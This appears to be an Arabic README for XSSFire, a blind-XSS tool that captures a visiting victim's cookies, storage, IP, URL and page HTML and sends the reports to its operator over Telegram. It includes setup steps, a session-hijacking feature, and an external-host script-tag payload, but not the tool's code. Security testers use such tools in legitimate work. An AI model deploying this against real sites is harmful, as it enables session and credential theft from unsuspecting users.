XSSFire
سكريبت مستقل لـ Blind XSS.
كيف يعمل:
السكريبت عبارة عن مزيج بين PHP و JavaScript، حيث يلتقط البيانات باستخدام JS ويرسلها إلى السكريبت نفسه، ثم ينشئ ملفات تقارير ويُسلّمها عبر تيليجرام.
المتطلبات:
- خادم ويب يعمل على Linux مع نطاق وشهادة SSL.
- حساب تيليجرام (لاستقبال تقارير BXSS)
لماذا تيليجرام؟
سهل الإعداد.
سريع.
يسهل الوصول إليه.
الميزات:
- يلتقط: IP، User-Agent، Date-Time، Local Storage، Session Storage، Cookies، Referrer، Origin، URL، HTML، إذا تم التشغيل من Iframe
- منشئ الجلسة: JavaScript يمكنه إعادة بناء الجلسة، افتح الرابط المُلتقط وأدوات المطوّر ثم الصق الكود في الكونسول واضغط Enter. إذا كنت محظوظًا بما يكفي يمكنك الاستيلاء على الجلسة.
- إشعارات تيليجرام: أسرع وأسهل في الإعداد من البريد الإلكتروني وأكثر وصولًا.
- مضاد للبريد العشوائي: يجب أن تستقبل إشعارًا واحدًا أو اثنين فقط لكل رابط تم التقاطه. ومع ذلك، يعيد السكريبت ضبط نفسه بين الحين والآخر ليُعلمك مرة أخرى لاحقًا.
- التشفير: يمكنك تعيين كلمة مرور في السكريبت، وسيكون التقرير الذي تستلمه في تيليجرام ملف zip محميًا بكلمة مرور. (لا تستخدم بوتات تيليجرام تشفيرًا من طرف إلى طرف).
- لقطة HTML: عبارة عن ملف HTML يتم تسليمه مع التقرير، ويجب أن يبدو مشابهًا لصفحة هدفك.
الإعداد:
- اذهب إلى تيليجرام وتحدث مع @botfather.
- اكتب /start في المحادثة وأنشئ بوتًا جديدًا.
- يجب أن تستلم رمز البوت الخاص بك عند إنشائه.
- احفظ الرمز جانبًا.
- الآن اذهب إلى محادثة البوت الذي أنشأته للتو وابدأه ثم ألقِ التحية.
- ثم انتقل إلى:
https://api.telegram.org/bot<bot_token>/getUpdates
- واحفظ معرّف المحادثة الخاص بك.
- افتح سكريبت XSSFire وعدّل الأسطر التالية:
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
- ارفع السكريبت إلى خادمك.
لتوليد الحمولات (payloads) يمكنك استخدام Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager
يمكنك ببساطة إنشاء الحمولات عبر هذه الإضافة عن طريق إدخال yourdomain.com/
ملاحظة: يمكنك تغيير اسم الملف إلى index.php ورفعه إلى الدليل الرئيسي لخادمك لجعل الحمولات أقصر، وعندها سيبدو الرابط مشابهًا لهذا <script src="https://yourdomain.com"></script>.
لقطات:
شكرًا إلى GPT-3 xD